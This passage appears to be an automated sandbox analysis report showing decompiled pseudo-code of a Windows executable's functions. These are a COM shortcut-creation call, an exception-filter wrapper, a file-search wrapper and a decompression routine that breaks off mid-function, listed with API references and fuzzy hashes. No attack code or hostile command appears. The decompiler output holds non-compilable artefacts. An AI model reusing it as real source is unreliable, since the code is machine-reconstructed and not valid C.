                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00402012, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134comCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 74%
                                                                                                			E00402012() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E004029E8(0xfffffff0);
				_t96 = E004029E8(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x2c)) = E004029E8(2);
				 *((intOrPtr*)(_t100 - 8)) = E004029E8(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x44)) = E004029E8(0x45);
				if(E0040548B(_t96) == 0) {
					E004029E8(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407490, _t75, 1, 0x407480, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x4074a0, _t100 - 0x34);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\jones\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409370, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 0x34));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409370, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 0x34));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                                                                                                0x0040201b
                                                                                                0x00402025
                                                                                                0x0040202e
                                                                                                0x00402038
                                                                                                0x00402041
                                                                                                0x0040204b
                                                                                                0x0040204f
                                                                                                0x0040204f
                                                                                                0x00402054
                                                                                                0x00402065
                                                                                                0x0040206d
                                                                                                0x0040214d
                                                                                                0x0040214d
                                                                                                0x00402154
                                                                                                0x00402073
                                                                                                0x00402073
                                                                                                0x00402084
                                                                                                0x00402088
                                                                                                0x0040208e
                                                                                                0x00402098
                                                                                                0x0040209a
                                                                                                0x004020a5
                                                                                                0x004020a8
                                                                                                0x004020b5
                                                                                                0x004020b7
                                                                                                0x004020b9
                                                                                                0x004020c0
                                                                                                0x004020c3
                                                                                                0x004020c3
                                                                                                0x004020c6
                                                                                                0x004020d0
                                                                                                0x004020d8
                                                                                                0x004020dd
                                                                                                0x004020e9
                                                                                                0x004020e9
                                                                                                0x004020ec
                                                                                                0x004020f5
                                                                                                0x004020f8
                                                                                                0x00402101
                                                                                                0x00402106
                                                                                                0x00402118
                                                                                                0x00402127
                                                                                                0x00402129
                                                                                                0x00402135
                                                                                                0x00402135
                                                                                                0x00402127
                                                                                                0x00402137
                                                                                                0x0040213d
                                                                                                0x0040213d
                                                                                                0x00402140
                                                                                                0x00402146
                                                                                                0x0040214b
                                                                                                0x00402160
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040214b
                                                                                                0x00402156
                                                                                                0x00402880
                                                                                                0x0040288c

                                                                                                APIs
                                                                                                • CoCreateInstance.OLE32(00407490,?,00000001,00407480,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402065
                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409370,00000400,?,00000001,00407480,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040211F
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Local\Temp, xrefs: 0040209D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ByteCharCreateInstanceMultiWide
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                • API String ID: 123533781-47812868
                                                                                                • Opcode ID: 2ca65707f57f31f88cc6a7fd1c1688d70cf0f88a2c7737c03cbde538d7105c3f
                                                                                                • Instruction ID: 24f6ed1ac1c0c168ca35b22597f39d8cd9e85fbc7861a3d68fdd8e416dd3802a
                                                                                                • Opcode Fuzzy Hash: 2ca65707f57f31f88cc6a7fd1c1688d70cf0f88a2c7737c03cbde538d7105c3f
                                                                                                • Instruction Fuzzy Hash: E2414DB5A00104AFCB00DFA4CD89E9E7BB9EF49354B20416AF505EB2E1DA79ED41CB64
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDB2A42, Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E6EDB2A42(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				return UnhandledExceptionFilter(_a4);
			}



                                                                                                0x6edb2a47
                                                                                                0x6edb2a57

                                                                                                APIs
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,6EDB5348,6EDBC9E8,00000001,?,6EDB545F,6EDBC9E8,00000017), ref: 6EDB2A47
                                                                                                • UnhandledExceptionFilter.KERNEL32(6EDBC9E8,?,6EDB5348,6EDBC9E8,00000001,?,6EDB545F,6EDBC9E8,00000017), ref: 6EDB2A50
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                • String ID:
                                                                                                • API String ID: 3192549508-0
                                                                                                • Opcode ID: 3ec1d9970bed65304ce15fad658dc738f412a43530d114b8f22b5a03eea585f5
                                                                                                • Instruction ID: 457dc31bc9bfd5dc5acf7fea3819ebcb6b3f3fd5d3024c0e3cea86674b8bf3cd
                                                                                                • Opcode Fuzzy Hash: 3ec1d9970bed65304ce15fad658dc738f412a43530d114b8f22b5a03eea585f5
                                                                                                • Instruction Fuzzy Hash: 62B09271448608EBEE202BA9D849BA83F28EF076A2F000010F65D44194EB6254528A91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00402630, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 39%
                                                                                                			E00402630(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E004029E8(2), _t19 - 0x1a4) != 0xffffffff) {
					E00405889(__edi, _t6);
					_push(_t19 - 0x178);
					_push(__esi);
					E0040592B();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                                                                                0x00402648
                                                                                                0x0040265c
                                                                                                0x00402667
                                                                                                0x00402668
                                                                                                0x004027a3
                                                                                                0x0040264a
                                                                                                0x0040264a
                                                                                                0x0040264c
                                                                                                0x0040264e
                                                                                                0x0040264e
                                                                                                0x00402880
                                                                                                0x0040288c

                                                                                                APIs
                                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040263F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: FileFindFirst
                                                                                                • String ID:
                                                                                                • API String ID: 1974802433-0
                                                                                                • Opcode ID: 0eff392dd80b659ea035236535e3ff8102da578794157fa10522713e52998ada
                                                                                                • Instruction ID: 00d369c81b6f5d5ac2b66fc3ece6c10e84ddf32e85f5a3588956fe302b8fe543
                                                                                                • Opcode Fuzzy Hash: 0eff392dd80b659ea035236535e3ff8102da578794157fa10522713e52998ada
                                                                                                • Instruction Fuzzy Hash: 18F0A0726081009EE700EBB59949EFEB768DF21324F6045BBF111B20C1C3B88946DA2A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00406043, Relevance: .3, Instructions: 334COMMONCrypto
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 79%
                                                                                                			E00406043(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E004067B2( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x407374; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x407374; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E0040681A( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M00406772))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x409340 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x409340 + __eax * 2) & 0x0000ffff =  *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x409340 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x409340 + __eax * 2) & 0x0000ffff =  *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E004067B2( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L172:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L163:
												__esi[0x26ea] = __edi;
												__eax = E004067B2( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L172;
												}
											}
											L158:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if(__eax == __edx) {
												goto L163;
											}
											L159:
											__edi = __edx;
											__eflags = __edi - __eax;
											if(__edi >= __eax) {
												__ecx = __ecx - __edi;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edi;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L172;
											} else {
												goto L163;
											}
										case 7:
											L173:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t380 = __ebp - 0x38;
												 *_t380 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t380;
											}
											goto L175;
										case 8:
											L4:
											while(_t425 < 3) {
												if( *(_t448 - 0x34) == 0) {
													goto L182;
												} else {
													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
													_t425 = _t425 + 8;
													continue;
												}
											}
											_t425 = _t425 - 3;
											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
											_t406 =  *(_t448 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t408 = _t406 >> 1;
											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
											if(_t408 == 0) {
												L24:
												 *_t446 = 9;
												_t436 = _t425 & 0x00000007;
												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
												_t425 = _t425 - _t436;
												goto L180;
											}
											L6:
											_t411 = _t408 - 1;
											if(_t411 == 0) {
												L13:
												__eflags =  *0x42daf0;
												if( *0x42daf0 != 0) {
													L22:
													_t412 =  *0x409364; // 0x9
													_t446[4] = _t412;
													_t413 =  *0x409368; // 0x5
													_t446[4] = _t413;
													_t414 =  *0x42c96c; // 0x0
													_t446[5] = _t414;
													_t415 =  *0x42c968; // 0x0
													_t446[6] = _t415;
													L23:
													 *_t446 =  *_t446 & 0x00000000;
													goto L180;
												} else {
													_t26 = _t448 - 8;
													 *_t26 =  *(_t448 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t416 = 0x42c970;
													goto L15;
													L20:
													 *_t416 = _t438;
													_t416 = _t416 + 4;
													__eflags = _t416 - 0x42cdf0;
													if(_t416 < 0x42cdf0) {
														L15:
														__eflags = _t416 - 0x42cbac;
														_t438 = 8;
														if(_t416 > 0x42cbac) {
															__eflags = _t416 - 0x42cd70;
															if(_t416 >= 0x42cd70) {
																__eflags = _t416 - 0x42cdd0;
																if(_t416 < 0x42cdd0) {
																	_t438 = 7;
																}
															} else {
																_t438 = 9;
															}
														}
														goto L20;
													} else {
														E0040681A(0x42c970, 0x120, 0x101, 0x407388, 0x4073c8, 0x42c96c, 0x409364, 0x42d270, _t448 - 8);
														_push(0x1e);
														_pop(_t440);
														_push(5);
														_pop(_t419);
														memset(0x42c970, _t419, _t440 << 2);
														_t450 = _t450 + 0xc;
														_t442 = 0x42c970 + _t440;
